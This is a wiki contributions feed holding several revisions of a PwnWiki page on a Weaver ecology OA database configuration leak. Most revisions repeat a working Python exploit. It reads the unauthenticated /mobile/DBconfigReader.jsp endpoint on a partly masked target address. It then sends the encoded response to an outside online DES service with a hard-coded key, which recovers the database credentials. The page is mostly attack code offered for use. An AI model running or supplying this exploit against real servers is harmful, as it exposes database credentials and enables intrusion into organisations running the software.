<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=SuperDolby</id>
	<title>PwnWiki - User contributions [Chinese]</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=SuperDolby"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Special:Contributions/SuperDolby"/>
	<updated>2026-04-07T09:17:03Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-cn&amp;diff=3916</id>
		<title>泛微ecology OA數據庫配置信息洩露/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-cn&amp;diff=3916"/>
		<updated>2021-06-03T03:21:00Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==利用前提==&lt;br /&gt;
/mobile/DBconfigReader.jsp 存在未授权访问&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import base64&lt;br /&gt;
import requests&lt;br /&gt;
import ast&lt;br /&gt;
 &lt;br /&gt;
def req(url):&lt;br /&gt;
    headers =  {&lt;br /&gt;
        'Content-Type':'application/x-www-form-urlencoded',&lt;br /&gt;
        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',&lt;br /&gt;
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',&lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
    r1 = requests.get(url,headers=headers).content&lt;br /&gt;
    s = r1.replace('\r\n','')&lt;br /&gt;
    res1 = base64.b64encode(s)&lt;br /&gt;
     &lt;br /&gt;
    postdata = {&lt;br /&gt;
        'data':res1,&lt;br /&gt;
        'type':'des',&lt;br /&gt;
        'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'&lt;br /&gt;
    }&lt;br /&gt;
    u = 'http://tool.chacuo.net/cryptdes'&lt;br /&gt;
    r2 = requests.post(u,data=postdata,headers=headers).content&lt;br /&gt;
    res2 = ast.literal_eval(r2)&lt;br /&gt;
     &lt;br /&gt;
    return res2['data']&lt;br /&gt;
 &lt;br /&gt;
url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'&lt;br /&gt;
print req(url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/1/zh-cn&amp;diff=3915</id>
		<title>Translations:泛微ecology OA數據庫配置信息洩露/1/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/1/zh-cn&amp;diff=3915"/>
		<updated>2021-06-03T03:19:55Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==利用前提==&lt;br /&gt;
/mobile/DBconfigReader.jsp 存在未授权访问&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/Page_display_title/zh-cn&amp;diff=3914</id>
		<title>Translations:泛微ecology OA數據庫配置信息洩露/Page display title/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/Page_display_title/zh-cn&amp;diff=3914"/>
		<updated>2021-06-03T03:19:16Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;泛微ecology OA 数据库配置信息泄露&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/en&amp;diff=3913</id>
		<title>泛微ecology OA數據庫配置信息洩露/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/en&amp;diff=3913"/>
		<updated>2021-06-03T03:17:27Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: Created page with &amp;quot;==Use premise== /mobile/DBconfigReader.jsp  There is unauthorized access.&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==Use premise==&lt;br /&gt;
/mobile/DBconfigReader.jsp&lt;br /&gt;
&lt;br /&gt;
There is unauthorized access.&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import base64&lt;br /&gt;
import requests&lt;br /&gt;
import ast&lt;br /&gt;
 &lt;br /&gt;
def req(url):&lt;br /&gt;
    headers =  {&lt;br /&gt;
        'Content-Type':'application/x-www-form-urlencoded',&lt;br /&gt;
        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',&lt;br /&gt;
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',&lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
    r1 = requests.get(url,headers=headers).content&lt;br /&gt;
    s = r1.replace('\r\n','')&lt;br /&gt;
    res1 = base64.b64encode(s)&lt;br /&gt;
     &lt;br /&gt;
    postdata = {&lt;br /&gt;
        'data':res1,&lt;br /&gt;
        'type':'des',&lt;br /&gt;
        'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'&lt;br /&gt;
    }&lt;br /&gt;
    u = 'http://tool.chacuo.net/cryptdes'&lt;br /&gt;
    r2 = requests.post(u,data=postdata,headers=headers).content&lt;br /&gt;
    res2 = ast.literal_eval(r2)&lt;br /&gt;
     &lt;br /&gt;
    return res2['data']&lt;br /&gt;
 &lt;br /&gt;
url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'&lt;br /&gt;
print req(url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/1/en&amp;diff=3912</id>
		<title>Translations:泛微ecology OA數據庫配置信息洩露/1/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/1/en&amp;diff=3912"/>
		<updated>2021-06-03T03:17:02Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: Created page with &amp;quot;==Use premise== /mobile/DBconfigReader.jsp  There is unauthorized access.&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Use premise==&lt;br /&gt;
/mobile/DBconfigReader.jsp&lt;br /&gt;
&lt;br /&gt;
There is unauthorized access.&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/en&amp;diff=3911</id>
		<title>泛微ecology OA數據庫配置信息洩露/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/en&amp;diff=3911"/>
		<updated>2021-06-03T03:16:59Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: Created page with &amp;quot;Fan Wei ecology OA database configuration information leaked&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
==利用前提==&lt;br /&gt;
/mobile/DBconfigReader.jsp存在未授權訪問。&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import base64&lt;br /&gt;
import requests&lt;br /&gt;
import ast&lt;br /&gt;
 &lt;br /&gt;
def req(url):&lt;br /&gt;
    headers =  {&lt;br /&gt;
        'Content-Type':'application/x-www-form-urlencoded',&lt;br /&gt;
        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',&lt;br /&gt;
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',&lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
    r1 = requests.get(url,headers=headers).content&lt;br /&gt;
    s = r1.replace('\r\n','')&lt;br /&gt;
    res1 = base64.b64encode(s)&lt;br /&gt;
     &lt;br /&gt;
    postdata = {&lt;br /&gt;
        'data':res1,&lt;br /&gt;
        'type':'des',&lt;br /&gt;
        'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'&lt;br /&gt;
    }&lt;br /&gt;
    u = 'http://tool.chacuo.net/cryptdes'&lt;br /&gt;
    r2 = requests.post(u,data=postdata,headers=headers).content&lt;br /&gt;
    res2 = ast.literal_eval(r2)&lt;br /&gt;
     &lt;br /&gt;
    return res2['data']&lt;br /&gt;
 &lt;br /&gt;
url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'&lt;br /&gt;
print req(url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/Page_display_title/en&amp;diff=3910</id>
		<title>Translations:泛微ecology OA數據庫配置信息洩露/Page display title/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/Page_display_title/en&amp;diff=3910"/>
		<updated>2021-06-03T03:16:40Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: Created page with &amp;quot;Fan Wei ecology OA database configuration information leaked&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Fan Wei ecology OA database configuration information leaked&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/Page_display_title/zh-cn&amp;diff=3909</id>
		<title>Translations:泛微ecology OA數據庫配置信息洩露/Page display title/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/Page_display_title/zh-cn&amp;diff=3909"/>
		<updated>2021-06-03T03:13:37Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: Created page with &amp;quot;Fan Wei ecology OA database configuration information leakage&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Fan Wei ecology OA database configuration information leakage&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-cn&amp;diff=3908</id>
		<title>泛微ecology OA數據庫配置信息洩露/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/zh-cn&amp;diff=3908"/>
		<updated>2021-06-03T03:13:31Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: Created page with &amp;quot;==Use premise== /mobile/DBconfigReader.jsp There is unauthorized access.&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages /&amp;gt;&lt;br /&gt;
==Use premise==&lt;br /&gt;
/mobile/DBconfigReader.jsp There is unauthorized access.&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
import base64&lt;br /&gt;
import requests&lt;br /&gt;
import ast&lt;br /&gt;
 &lt;br /&gt;
def req(url):&lt;br /&gt;
    headers =  {&lt;br /&gt;
        'Content-Type':'application/x-www-form-urlencoded',&lt;br /&gt;
        'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',&lt;br /&gt;
        'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',&lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
    r1 = requests.get(url,headers=headers).content&lt;br /&gt;
    s = r1.replace('\r\n','')&lt;br /&gt;
    res1 = base64.b64encode(s)&lt;br /&gt;
     &lt;br /&gt;
    postdata = {&lt;br /&gt;
        'data':res1,&lt;br /&gt;
        'type':'des',&lt;br /&gt;
        'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'&lt;br /&gt;
    }&lt;br /&gt;
    u = 'http://tool.chacuo.net/cryptdes'&lt;br /&gt;
    r2 = requests.post(u,data=postdata,headers=headers).content&lt;br /&gt;
    res2 = ast.literal_eval(r2)&lt;br /&gt;
     &lt;br /&gt;
    return res2['data']&lt;br /&gt;
 &lt;br /&gt;
url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'&lt;br /&gt;
print req(url)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/1/zh-cn&amp;diff=3907</id>
		<title>Translations:泛微ecology OA數據庫配置信息洩露/1/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/1/zh-cn&amp;diff=3907"/>
		<updated>2021-06-03T03:13:08Z</updated>

		<summary type="html">&lt;p&gt;SuperDolby: Created page with &amp;quot;==Use premise== /mobile/DBconfigReader.jsp There is unauthorized access.&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==Use premise==&lt;br /&gt;
/mobile/DBconfigReader.jsp There is unauthorized access.&lt;/div&gt;</summary>
		<author><name>SuperDolby</name></author>
	</entry>
</feed>